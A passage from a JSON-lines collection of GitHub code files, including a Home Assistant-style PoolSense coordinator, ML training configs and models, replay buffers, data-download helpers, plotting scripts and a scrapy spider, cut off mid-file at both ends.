super().__init__(coordinator)\n self._unique_id = f\"{email}-{info_type}\"\n self.info_type = info_type\n\n @property\n def unique_id(self):\n \"\"\"Return a unique id.\"\"\"\n return self._unique_id\n\n\nclass PoolSenseDataUpdateCoordinator(DataUpdateCoordinator):\n \"\"\"Define an object to hold PoolSense data.\"\"\"\n\n def __init__(self, opp, entry):\n \"\"\"Initialize.\"\"\"\n self.poolsense = PoolSense(\n aiohttp_client.async_get_clientsession(opp),\n entry.data[CONF_EMAIL],\n entry.data[CONF_PASSWORD],\n )\n self.opp = opp\n self.entry = entry\n\n super().__init__(opp, _LOGGER, name=DOMAIN, update_interval=timedelta(hours=1))\n\n async def _async_update_data(self):\n \"\"\"Update data via library.\"\"\"\n data = {}\n with async_timeout.timeout(10):\n try:\n data = await self.poolsense.get_poolsense_data()\n except (PoolSenseError) as error:\n _LOGGER.error(\"PoolSense query did not complete\")\n raise UpdateFailed(error) from error\n\n return data\n","repo_name":"OpenPeerPower/core","sub_path":"openpeerpower/components/poolsense/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"34835702666","text":"# config.py\nfrom yacs.config import CfgNode as CN\n\n_C = CN()\n\n_C.WORK = CN()\n_C.WORK.PATH = \"\"\n\n_C.DATA = CN()\n_C.DATA.PATH = \"\"\n_C.DATA.PATH_TEST = \"\"\n_C.DATA.PATH_TRAIN = \"\"\n_C.DATA.FNAME_LABELS = \"\"\n\n_C.PRETRAINED = CN()\n_C.PRETRAINED.PATH = \"\"\n_C.PRETRAINED.FNAME_PREMODEL = \"\"\n\n_C.PROCESSED = CN()\n_C.PROCESSED.PATH = \"\"\n\n_C.OUTPUT = CN()\n_C.OUTPUT.PATH = \"\"\n\n_C.TRAIN = CN()\n_C.TRAIN.FRAC_FOR_TRAIN = 0.8\n_C.TRAIN.NUM_CLASSES = 0\n_C.TRAIN.NUM_EPOCHS = 3\n_C.TRAIN.BATCH_SIZE = 100\n_C.TRAIN.LEARNING_RATE = 0.001\n_C.TRAIN.MOMENTUM = 0.9\n_C.TRAIN.STEP_SIZE = 7\n_C.TRAIN.GAMMA = 0.1\n\n_C.PREDICT = CN()\n_C.PREDICT.BATCH_SIZE = 100\n_C.PREDICT.MODEL_PATH = \"D:\\\\GitWork\\\\dog_breed\\\\pretrained\\\\\"\n_C.PREDICT.MODEL_FILE = 'resnet50_20200926-2053_t9175_v9339.pth'\n\n\ndef get_cfg_defaults():\n \"\"\"Get a yacs CfgNode object with default values for the project.\"\"\"\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return _C.clone()","repo_name":"morpheus9631/dog_breed","sub_path":"configs/config_train_v3.py","file_name":"config_train_v3.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"31509786749","text":"import time\nimport threading\nimport win32api\nimport win32con\n\nmonke = int(input('input length of autoclicker: '))\ndef autoclick():\n \n \n delay = 0.02\n\n \n while not stop_flag:\n # Use the win32api and win32con modules to perform a left mouse click\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0)\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0)\n\n \n time.sleep(delay)\n\n\nstop_flag = False\n\n\nthreading.Thread(target=autoclick).start()\n\n\ntime.sleep(monke)\n\n\nstop_flag = not stop_flag\n","repo_name":"cybershinig4mi/AutoClickerOrganic","sub_path":"clicker.py","file_name":"clicker.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"17698460573","text":"#!/usr/bin/env python3\n\nimport glob\nimport os\nimport re\n\nfrom pyrocko.guts import Object, String, Dict, List\n\n\nclass TestResult(Object):\n package = String.T()\n branch = String.T(optional=True)\n box = String.T()\n py_version = String.T(optional=True)\n prerequisite_versions = Dict.T(\n String.T(), String.T(), optional=True, default={})\n log = String.T(optional=True, yamlstyle='|')\n result = String.T(optional=True)\n errors = List.T(String.T(), optional=True, default=[], yamlstyle='block')\n fails = List.T(String.T(), optional=True, default=[], yamlstyle='block')\n skips = List.T(String.T(), optional=True, default=[], yamlstyle='block')\n\n\ndef parse_result(res, package, box, fn):\n\n with open(fn, 'r') as f:\n txt = f.read()\n\n lines = txt.splitlines()\n for line in lines[:7]:\n pack, vers = line.split(': ')\n res.prerequisite_versions[pack] = vers\n\n txt = '\\n'.join(\n line for line in lines if not re.match(r'^Q\\w+::', line))\n txt = re.sub(r' +\\n', '\\n', txt)\n\n res.log = txt.strip()\n\n m = re.search(r'^=+ (.*) =+$', lines[-1], re.M)\n if m:\n if m.group(1).find('failed') != -1:\n res.result = 'FAILED (%s)' % m.group(1)\n else:\n res.result = 'OK (%s)' % m.group(1)\n\n count = {}\n for x in re.findall(r'^(.*) SKIPPED', txt, re.M):\n if x not in count:\n count[x] = 1\n else:\n count[x] += 1\n\n for x in sorted(count.keys()):\n res.skips.append('%s (%ix)' % (x, count[x]))\n\n for x in re.findall(r'^(.*) FAILED', txt, re.M):\n res.fails.append(x)\n\n\ndef iter_results():\n package = 'pyrocko'\n if os.path.exists('vagrant'):\n boxes = os.listdir('vagrant')\n\n else:\n boxes = [os.path.basename(os.path.abspath('.'))]\n os.chdir('../..')\n\n for box in sorted(boxes):\n\n fns = glob.glob(os.path.join('vagrant', box, 'test-*.py[23].out'))\n if fns:\n for fn in fns:\n m = re.search(r'/test-(.*)\\.py([23])\\.out$', fn)\n res = TestResult(package=package, branch=m.group(1), box=box)\n res.py_version = m.group(2)\n parse_result(res, package, box, fn)\n yield res\n\n else:\n res = TestResult(\n package=package, box=box,\n result='ERROR (running the tests failed)')\n\n yield res\n\n\nif __name__ == '__main__':\n for r in iter_results():\n print(r)\n","repo_name":"pyrocko/pyrocko","sub_path":"maintenance/vagrant_tests_collect.py","file_name":"vagrant_tests_collect.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"4"} +{"seq_id":"35022507025","text":"class Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n ans = []\n numLen = len(nums)\n def perm(n,cur):\n if len(cur) == numLen:\n if len(set(cur)) == numLen:\n ans.append(cur[:])\n return\n for i in range(numLen):\n # if nums[i] != nums[n]:\n cur.append(nums[i])\n perm(i, cur)\n cur.pop()\n perm(1,[])\n return ans","repo_name":"abelops/Competitive-Programming","sub_path":"0046-permutations/0046-permutations.py","file_name":"0046-permutations.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"6951700748","text":"import torch\nimport torch.nn as nn\n\nclass Model(nn.Module):\n def __init__(self,in_channel=3,out_channel=1):\n super(Model,self).__init__()\n self.pooling=nn.MaxPool2d((2,2))\n self.upsample=nn.Upsample(scale_factor=2,mode='bicubic')\n self.layer1=nn.Sequential(\n nn.Conv2d(in_channel,64,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,64,3,1,1),\n nn.ReLU(inplace=True),\n )\n self.layer2=nn.Sequential(\n nn.Conv2d(64,128,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(128,128,3,1,1),\n nn.ReLU(inplace=True),\n )\n self.layer3=nn.Sequential(\n nn.Conv2d(128,256,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256,256,3,1,1),\n nn.ReLU(inplace=True),\n )\n self.layer4=nn.Sequential(\n nn.Conv2d(256,256,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256,256,3,1,1),\n nn.ReLU(inplace=True),\n )\n #concat[layer4_out,layer3_out]\n self.layer5=nn.Sequential(\n nn.Conv2d(512,128,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(128,128,3,1,1),\n nn.ReLU(inplace=True),\n )\n #concat[layer5_out,layer3_out]\n self.layer6=nn.Sequential(\n nn.Conv2d(256,64,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,64,3,1,1),\n nn.ReLU(inplace=True),\n )\n #concat[layer5_out,layer3_out]\n self.layer7=nn.Sequential(\n nn.Conv2d(128,64,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,64,3,1,1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,1,3,1,1),\n nn.Sigmoid()\n )\n\n def forward(self,x):\n x1=self.layer1(x)\n x1_pool=self.pooling(x1)\n\n x2=self.layer2(x1_pool)\n x2_pool=self.pooling(x2)\n\n x3=self.layer3(x2_pool)\n x3_pool=self.pooling(x3)\n\n x4=self.layer4(x3_pool)\n x4_pool=self.upsample(x4)\n\n x5=self.layer5(torch.cat([x4_pool,x3],dim=1))\n x5_pool=self.upsample(x5)\n\n x6=self.layer6(torch.cat([x5_pool,x2],dim=1))\n x6_pool=self.upsample(x6)\n\n x7=self.layer7(torch.cat([x6_pool,x1],dim=1))\n\n return x7\n\n\ndef main():\n model=Model().cuda()\n a=torch.randn((8,3,256,256)).cuda()\n y=model(a)\n print(a.shape,y.shape)\n \n\nif __name__ == '__main__':\n main()\n \n\n \n\n","repo_name":"helloful/ImageSeg","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"17090181634","text":"import os\nimport sys\nimport urllib.request\nfrom tqdm import tqdm\nfrom itertools import chain\nimport zipfile\nimport json\n\ndef downloadurltofile(url,filename):\n if not os.path.exists(filename):\n print(f'--> Downloading {filename} <--'.center(80, '#'))\n with open(filename, 'wb') as file:\n with urllib.request.urlopen(url) as resp:\n length = int(resp.getheader('content-length'))\n blocksize = max(4096, length // 100)\n with tqdm(total=length, file=sys.stdout) as pbar:\n while True:\n buff = resp.read(blocksize)\n if not buff:\n break\n file.write(buff)\n pbar.update(len(buff))\n print(' Download complete '.center(80,'#'))\n else:\n print(f'-->> {filename} file already exists locally <<--'.center(80, '#'))\n print()\n\ndef download(url,targetfolder,targetfile):\n path = os.getcwd()\n data_dir = os.path.abspath(os.path.join(path, targetfolder))\n\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n \n targetfile = os.path.join(data_dir, targetfile)\n downloadurltofile(url,targetfile)\n return data_dir,targetfile\n\ndef unzippedfile(folder,file):\n with zipfile.ZipFile(file, 'r') as zip_ref:\n zip_ref.extractall(folder)\n\ndef upload_data(workspace, datastore, src_dir, tgt_path):\n datastore.upload(\n src_dir=src_dir,\n target_path=tgt_path,\n show_progress=True)\n print(' Upload complete '.center(80,'#'))\n\ndef get_config(configfile):\n jsonfile = open(configfile)\n configdata = json.load(jsonfile)\n return configdata\n","repo_name":"manuelreyesgomez/ClaraCovidTranferLearningExample","sub_path":"ngccontent.py","file_name":"ngccontent.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"16960795323","text":"import torch\nfrom abc import ABC, abstractmethod\nfrom typing import (\n Tuple,\n Union,\n Dict,\n List,\n)\nfrom shell_data.utils.utils import knn_dist\nimport logging\n\n\nclass Buffer(ABC):\n @abstractmethod\n def add_data(self, data):\n pass\n\n @abstractmethod\n def get_data(self, batch_size):\n pass\n\n @abstractmethod\n def __len__(self):\n pass\n\n def is_empty(self):\n return len(self) == 0\n\n def update_tasks(self, task_idx):\n pass\n\n\nclass SupervisedLearningBuffer(Buffer):\n \"\"\"\n Infinite-size buffer for supervised learning tasks.\n Consisting of a tensor of features and a tensor of labels.\n \"\"\"\n\n def __init__(self, dim, task):\n super().__init__()\n self.dim = dim\n self.X = torch.empty(0, *dim)\n label_type = torch.long if task == 'classification' else torch.float\n self.y = torch.empty(0, dtype=label_type)\n\n def add_data(self, data, dedup=True):\n if dedup and len(self) > 0:\n data = self.dedup(data)\n x, y = data\n self.X = torch.cat((self.X, x))\n self.y = torch.cat((self.y, y))\n\n def dedup(self, data, ret_mask=False) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Process data and remove the data that is already in the buffer.\n\n Return a mask: true if the data is NOT in the buffer. False otherwise.\n \"\"\"\n if len(self) == 0:\n if ret_mask:\n return torch.ones(len(data[0]), dtype=torch.bool)\n return data\n\n x, y = data\n distances = knn_dist(x, self.X, k=1)\n # if distances = 0, then the data is already in the buffer and should be removed\n eps = 0.01 # HACK: because of floating point error\n mask = distances > eps\n logging.debug(f\"No. of duplicates: {len(mask) - mask.sum()}\")\n if ret_mask:\n return mask\n return x[mask], y[mask]\n\n def get_data(self, batch_size):\n \"\"\"\n Sample (without replacement) a batch of data from the buffer.\n \"\"\"\n batch_size = min(batch_size, len(self))\n idx = torch.randperm(len(self.X))[:batch_size]\n return self.X[idx], self.y[idx]\n\n def __len__(self):\n return len(self.X)\n\n def save_buffer(self, path_name):\n torch.save(self.X, f\"{path_name}_X.pt\")\n torch.save(self.y, f\"{path_name}_y.pt\")\n\n def load(self, path_name):\n self.X = torch.load(f\"{path_name}_X.pt\")\n self.y = torch.load(f\"{path_name}_y.pt\")\n\n\nclass ClassifcationBuffer(SupervisedLearningBuffer):\n def __init__(self, dim, num_classes):\n super().__init__(dim, 'classification')\n self.num_classes = num_classes\n\n def get_cls_counts(self):\n # HACK: assume that the num_cls = 10\n return {f\"cls_{i}\": (self.y == i).sum().item() for i in range(self.num_classes)}\n\n\nclass ReservoirSamplingClassificationBuffer(ClassifcationBuffer):\n def __init__(self, dim, buffer_size, num_classes):\n super().__init__(dim, num_classes)\n self.buffer_size = buffer_size\n self._buffer_weights = torch.zeros(0)\n\n # https://avalanche-api.continualai.org/en/v0.1.0/_modules/avalanche/training/storage_policy.html#ReservoirSamplingBuffer\n def add_data(self, data, dedup=True):\n if len(data[0]) == 0:\n return\n if dedup and len(self) > 0:\n data = self.dedup(data)\n x, y = data\n # self.X = torch.cat((self.X, x))\n # self.y = torch.cat((self.y, y))\n new_weights = torch.rand(len(x))\n cat_weights = torch.cat([new_weights, self._buffer_weights])\n cat_x = torch.cat([x, self.X])\n cat_y = torch.cat([y, self.y])\n sorted_weights, sorted_idxs = cat_weights.sort(descending=True)\n\n buffer_idxs = sorted_idxs[:self.buffer_size]\n self.X = cat_x[buffer_idxs]\n self.y = cat_y[buffer_idxs]\n self._buffer_weights = sorted_weights[:self.buffer_size]\n\n\nclass RegressionBuffer(SupervisedLearningBuffer):\n def __init__(self, dim):\n super().__init__(dim, 'regression')\n\n\nclass BalancedClassificationBuffer(Buffer):\n def __init__(self, dim, num_classes):\n super().__init__()\n self.dim = dim\n self.num_classes = num_classes\n self.buffers = [ClassifcationBuffer(dim) for _ in range(num_classes)]\n self.past_tasks = []\n\n def save_buffer(self, path):\n for buffer_id, buffer in enumerate(self.buffers):\n buffer.save_buffer(path_name=f'{path}_buffer_{buffer_id}')\n\n def load(self, path):\n for buffer_id, buffer in enumerate(self.buffers):\n buffer.load(path_name=f'{path}_buffer_{buffer_id}')\n\n def update_tasks(self, task_idx: List[int]):\n self.past_tasks += task_idx\n\n def get_cls_counts(self) -> dict:\n return {f\"cls_{i}\": len(b) for i, b in enumerate(self.buffers)}\n\n def add_data(self, data):\n x, y = data\n for i in range(self.num_classes):\n idx = y == i\n self.buffers[i].add_data((x[idx], y[idx]))\n\n def get_data(self, batch_size: Union[int, Dict[int, int]]) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Sample (without replacement) a batch of data from the buffer,\n making sure that each class is represented equally.\n\n If batch_size is an integer, then the batch size is the same for\n all non-empty classes. If batch_size is a dictionary, then the\n batch size for each class is specified by the dictionary.\n \"\"\"\n assert isinstance(batch_size, (int, dict))\n if isinstance(batch_size, int):\n nonzero_num_classes = sum([len(b) > 0 for b in self.buffers])\n min_num_samples = min([len(b) for b_id, b in enumerate(\n self.buffers) if len(b) > 0 and b_id in self.past_tasks])\n X = torch.empty(0, *self.dim)\n y = torch.empty(0, dtype=torch.long)\n for b_id, b in enumerate(self.buffers):\n if isinstance(batch_size, int):\n cls_batch_size = min(\n batch_size // nonzero_num_classes, min_num_samples)\n elif isinstance(batch_size, dict) and b_id in batch_size:\n cls_batch_size = batch_size[b_id]\n else:\n continue\n if len(b) < cls_batch_size:\n continue\n cls_data = b.get_data(cls_batch_size)\n X = torch.cat((X, cls_data[0]))\n y = torch.cat((y, cls_data[1]))\n return X, y\n\n def __len__(self):\n return sum([len(b) for b in self.buffers])\n\n\ndef get_dataset_from_buffer(buffer: Buffer, data_size: int):\n buf_x, buf_y = buffer.get_data(\n batch_size=data_size\n )\n return torch.utils.data.TensorDataset(buf_x, buf_y)\n","repo_name":"vlongle/shell-refactor-data","sub_path":"shell-data/shell_data/dataset/buffer.py","file_name":"buffer.py","file_ext":"py","file_size_in_byte":6762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"14828394577","text":"#!/usr/bin/env python3 \n# -*- coding: utf-8 -*- \n\"\"\" \nCreated by Lanrete on 2018/6/15\n\"\"\"\n\nimport gc\nimport pandas as pd\n\nfrom sklearn.preprocessing import LabelEncoder\n\nfrom config import FIT_PARAMS\nfrom utility import timer\nfrom bureau_data_prepare import agg_bureau\nfrom pre_application_data_prepare import agg_pre_application\nfrom pipeline import fit_pipeline\n\nDATA_PATH = '../data'\n\n\ndef main(fit_params):\n data_path = '../data'\n train_base = pd.read_csv(f'{data_path}/application_train.csv')\n test_base = pd.read_csv(f'{data_path}/application_test.csv')\n\n train_base.set_index(keys='SK_ID_CURR', drop=True, inplace=True)\n test_base.set_index(keys='SK_ID_CURR', drop=True, inplace=True)\n\n with timer('Creating variables in base set'):\n for df in [train_base, test_base]:\n df['ANNUITY_INCOME_PERC'] = df['AMT_ANNUITY'] / df['AMT_INCOME_TOTAL']\n df['PAYMENT_RATE'] = df['AMT_ANNUITY'] / df['AMT_CREDIT']\n df['INCOME_CREDIT_PERC'] = df['AMT_INCOME_TOTAL'] / df['AMT_CREDIT']\n\n with timer('Aggregating bureau.csv'):\n bureau_df = agg_bureau()\n train_base = train_base.join(bureau_df, how='left')\n test_base = test_base.join(bureau_df, how='left')\n del bureau_df\n gc.collect()\n\n with timer('Aggregating previous_application.csv'):\n previous_application_df = agg_pre_application()\n train_base = train_base.join(previous_application_df, how='left')\n test_base = test_base.join(previous_application_df, how='left')\n del previous_application_df\n gc.collect()\n\n y = train_base['TARGET']\n del train_base['TARGET']\n y = LabelEncoder().fit_transform(y)\n\n header = 'Grid Searching Pipeline with parameter grids' if fit_params else 'Fitting and predicting'\n\n with timer(header):\n fit_pipeline(\n train_base, y,\n predict=True, x_score=test_base, fit_params=fit_params\n )\n\n\nif __name__ == '__main__':\n main(fit_params=FIT_PARAMS)\n","repo_name":"lanrete/HomeCreditDefaultRisk","sub_path":"source/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"3797939286","text":"from collections import defaultdict\n\ndef solution(fees, records):\n \n basic_t, base_price, unit_t, unit_price = fees\n \n def price(log, fees): # 2\n if len(log) % 2:\n log.append(23*60+59)\n t = sum(log[i+1] - log[i] for i in range(0, len(log), 2))\n return unit_price * -(-max(0, t-basic_t) // unit_t) + base_price\n \n log = defaultdict(list)\n \n for record in records: # 1\n t, n, _ = record.split()\n h, m = map(int, t.split(':'))\n log[n].append(60*h+ m)\n \n return [price(log[n], fees) for n in sorted(log)] # 3\n# import math\n\n# def solution(fees, records):\n# parking = {}\n# check = {}\n# answer = {}\n\n# for i in records:\n# time, number, order = i.split()\n# now = list(map(int,time.split(':')))\n# now_m = now[0] * 60 + now[1]\n# if order == \"IN\":\n# parking[number] = now_m\n# check[number] = True\n# if number not in answer:\n# answer[number] = 0\n# else:\n# check[number] = False\n# answer[number] += now_m - parking[number]\n\n# for i, flag in check.items():\n# if flag:\n# answer[i] += (23*60+59) - parking[i]\n# check[i] = True\n\n# for num, v in answer.items():\n# if v > fees[0]: # 요금 계산\n# answer[num] = fees[1] + (math.ceil((v - fees[0])/fees[2]))*fees[3]\n# else:\n# answer[num] = fees[1]\n\n# return list(dict(sorted(answer.items())).values())\n\n\n\nfees = [180, 5000, 10, 600]\nrecords = [\"05:34 5961 IN\", \"06:00 0000 IN\", \"06:34 0000 OUT\", \"07:59 5961 OUT\", \"07:59 0148 IN\", \"18:59 0000 IN\", \"19:09 0148 OUT\", \"22:59 5961 IN\", \"23:00 5961 OUT\"]\n# fees = [120, 0, 60, 591]\n# records = [\"16:00 3961 IN\",\"16:00 0202 IN\",\"18:00 3961 OUT\",\"18:00 0202 OUT\",\"23:58 3961 IN\"]\n# fees = [1, 461, 1, 10]\n# records = [\"00:00 1234 IN\"]\n\nprint(solution(fees, records))","repo_name":"BreathIN423/CodingTest","sub_path":"PGM/Python/lv2/주차 요금 계산.py","file_name":"주차 요금 계산.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"72035588597","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom databases.students import students\nfrom databases import ACOLE1, ACOLE2\nfrom methods import opt\nfrom base import default_axis_config\nfrom colors import color1, color2\nfrom Fig27_m1_tests import boxplot_blocks_pairs\n\ntop_labels = ['Leitura', 'Ditado por composição', 'Ditado manuscrito']\ninner_labels = ['Palavras regulares CV', 'Palavras com\\ndificuldades ortográficas']\n\n# def boxplot_blocks(ax, blocks, label):\n# bar_positions = np.arange(len(blocks))\n\n# data = [[p for p in block.data['deltas'] if p is not None] for block in blocks]\n# boxprops = dict(linewidth=1, color='black')\n# medianprops = dict(linewidth=2, color='orange')\n\n# bp1 = ax.boxplot(data[::2], positions=bar_positions[::2], widths=0.6, sym='o', boxprops=boxprops, medianprops=medianprops)\n# bp2 = ax.boxplot(data[1::2], positions=bar_positions[1::2], widths=0.6, sym='o', boxprops=boxprops, medianprops=medianprops)\n\n# ax.set_title(label)\n# default_axis_config(ax)\n\n# ax.set_xticks(bar_positions)\n# ax.set_xticklabels([block.legend for block in blocks], rotation=45, ha='right')\n\n# labels = [block.legend for block in blocks]\n# return bp1, bp2, labels\n\ndef plot_blocks(ax, blocks, label, y_padding=1.0):\n bar_width = 0.4\n bar_positions = np.arange(len(blocks))\n\n data = [[p for p in block.data['deltas'] if p is not None] for block in blocks]\n\n # calculate mean\n means = [np.mean(d) for d in data]\n\n # ax.set_ylim(0, 100)\n ax.set_title(label, y=y_padding)\n default_axis_config(ax, False)\n\n legends = [block.legend for block in blocks][0::2]\n ax.bar(bar_positions[::2], means[::2], width=bar_width, color=color1, label=inner_labels[0])\n ax.bar(bar_positions[1::2]-bar_width, means[1::2], width=bar_width, color=color2, label=inner_labels[1])\n\n ax.set_xticks(np.array(bar_positions[1::2]) - bar_width - bar_width / 2)\n ax.set_xticklabels(legends, ha='center')\n\nfilters = {\n 'Fig30_m1_completo': lambda students : [student for student in students if student.has_two_acoles() and student.has_m1],\n 'Fig30_m1_completo_acoles_completas': lambda students : [student for student in students if student.has_two_complete_acoles() and student.has_m1],\n 'Fig30_m1_completo_primeira_acole_incompleta': lambda students : [student for student in students if student.has_two_acoles_first_incomplete() and student.has_m1],\n\n 'Fig31_m2_completo': lambda students : [student for student in students if student.has_two_acoles() and student.has_m2],\n 'Fig31_m2_completo_acoles_completas': lambda students : [student for student in students if student.has_two_complete_acoles() and student.has_m2],\n 'Fig31_m2_completo_primeira_acole_incompleta': lambda students : [student for student in students if student.has_two_acoles_first_incomplete() and student.has_m2],\n\n 'Fig32_m3_completo': lambda students : [student for student in students if student.has_two_acoles() and student.has_m3],\n 'Fig32_m3_completo_acoles_completas': lambda students : [student for student in students if student.has_two_complete_acoles() and student.has_m3],\n 'Fig32_m3_completo_primeira_acole_incompleta': lambda students : [student for student in students if student.has_two_acoles_first_incomplete() and student.has_m3],\n\n 'Fig34_has_first_acole_incomplete': lambda students : [student for student in students if student.has_two_acoles_first_incomplete()],\n 'Fig33_has_two_acoles': lambda students : [student for student in students if student.has_two_acoles()],\n 'Fig35_has_two_complete_acoles': lambda students : [student for student in students if student.has_two_complete_acoles()],\n}\n\ndef bar_plot(students, use_boxplot, filename):\n if use_boxplot:\n figure_name = filename+'_boxplot'\n else:\n figure_name = filename\n opt.set_filename(figure_name)\n reading = []\n composition = []\n manuscript = []\n\n ACOLE_1 = ACOLE1.create()\n ACOLE_2 = ACOLE2.create()\n\n for student in filters[filename](students):\n ac1, ac2 = student.get_first_and_second_acoles()\n for block, student_block in zip(ACOLE_1.blocks, student.acoles[ac1].blocks):\n for key, data in student_block.data.items():\n if len(data) > 0:\n for d in data:\n block.data[key].append(d)\n\n for block, student_block in zip(ACOLE_2.blocks, student.acoles[ac2].blocks):\n for key, data in student_block.data.items():\n if len(data) > 0:\n for d in data:\n block.data[key].append(d)\n\n # df = ACOLE_2.days_per_week()\n # min_ = df['mean_days_per_week'].min() # 0.07317073170731707\n # max_ = df['mean_days_per_week'].max() # 2.4615384615384617\n values = [0.72, 1.30, 1.50, 1.70, 2.5]\n\n for r in ACOLE2.custom_range(values):\n blocks1 = ACOLE_1.by_frequency(r)\n blocks2 = ACOLE_2.by_frequency(r)\n reading.append(blocks2.LEITURA.delta(blocks1.LEITURA))\n reading.append(blocks2.LEITURA_DIFICULDADES.delta(blocks1.LEITURA_DIFICULDADES))\n composition.append(blocks2.DITADO_COMPOSICAO.delta(blocks1.DITADO_COMPOSICAO))\n composition.append(blocks2.DITADO_COMPOSICAO_DIFICULDADES.delta(blocks1.DITADO_COMPOSICAO_DIFICULDADES))\n manuscript.append(blocks2.DITADO_MANUSCRITO.delta(blocks1.DITADO_MANUSCRITO))\n manuscript.append(blocks2.DITADO_MANUSCRITO_DIFICULDADES.delta(blocks1.DITADO_MANUSCRITO_DIFICULDADES))\n\n fig, axs = plt.subplots(3, 1, sharey=True)\n fig.set_size_inches(5, 10)\n fig.set_dpi(100)\n # fig.suptitle(title, y=1.035, fontsize=14)\n\n groups = [reading, composition, manuscript]\n for group in groups:\n for block in group:\n block.legend = str([block.frequency_range.low, block.frequency_range.high])\n\n axs[1].set_ylabel('Diferença da porcentagem média de acertos')\n bpg1 = []\n bpg2 = []\n for (ax, title, data) in zip(axs, top_labels, groups):\n if use_boxplot:\n bp1, bp2, _ = boxplot_blocks_pairs(ax, data, title, title_y=1.0, limity=False, data='deltas')\n bpg1.append(bp1)\n bpg2.append(bp2)\n else:\n plot_blocks(ax, data, title)\n\n fig.tight_layout()\n\n fig.text(0.5, -0.02, 'Faixa de frequência semanal\\n(Dias/Semana)', ha='center', va='center', fontsize=12)\n\n x1 = 0.5\n y1 = 1.05\n if use_boxplot:\n fig.legend([bpg1[0][\"boxes\"][0], bpg2[0][\"boxes\"][0]], inner_labels, loc='upper center', bbox_to_anchor=(x1, y1), ncol=2)\n else:\n handles, labels = ax.get_legend_handles_labels()\n fig.legend(handles, labels, loc='upper center', bbox_to_anchor=(x1, y1), ncol=2)\n\n plt.savefig(opt.output_path(), bbox_inches='tight')\n plt.close()\n\ndef plot():\n \"\"\"\n Diferença entre a porcentagem de acertos na ACOLE final e inicial,\n \"\"\"\n for filename in filters.keys():\n bar_plot(students, use_boxplot=False, filename=filename)\n bar_plot(students, use_boxplot=True, filename=filename)\n\n # schools = sorted([k for k in students.schools(True).keys()])\n # for school in schools:\n # for filename in filters.keys():\n # students_by_school = students.by_school(school)\n # bar_plot(students_by_school, use_boxplot=False, filename=filename+'_'+school)\n # bar_plot(students_by_school, use_boxplot=True, filename=filename+'_'+school)\nif __name__ == \"__main__\":\n plot()","repo_name":"cpicanco/alfatech-analysis","sub_path":"figures/Fig30_frequency_deltas.py","file_name":"Fig30_frequency_deltas.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"6971542035","text":"import lxml.html\n\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.contrib.loader.processor import Compose\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.selector import HtmlXPathSelector\n\nfrom rho_blogs.loaders import (BlogPostLoader, BlogAuthorLoader,\n CommentPostLoader, CommentAuthorLoader)\nfrom rho_blogs.processors import StringToDatetime\n\n\ndef strip_profile_url(value):\n \"\"\"strip /weblog/ from profile url\"\"\"\n if value.endswith('weblog/'):\n value = value[:-7]\n return value\n\ndef clean_post(value):\n \"\"\"Remove unwanted elements in post content\"\"\"\n doc = lxml.html.fragment_fromstring(value)\n doc.tag = 'div' # replaces

  • \n doc.attrib.clear()\n\n # remove comment owner info\n for e in doc.xpath('//div[@class=\"weblog_keywords\"]'):\n e.drop_tree()\n\n return lxml.html.tostring(doc)\n\ndef clean_comment(value):\n \"\"\"Remove unwanted elements in comment content\"\"\"\n doc = lxml.html.fragment_fromstring(value)\n doc.tag = 'div' # replaces
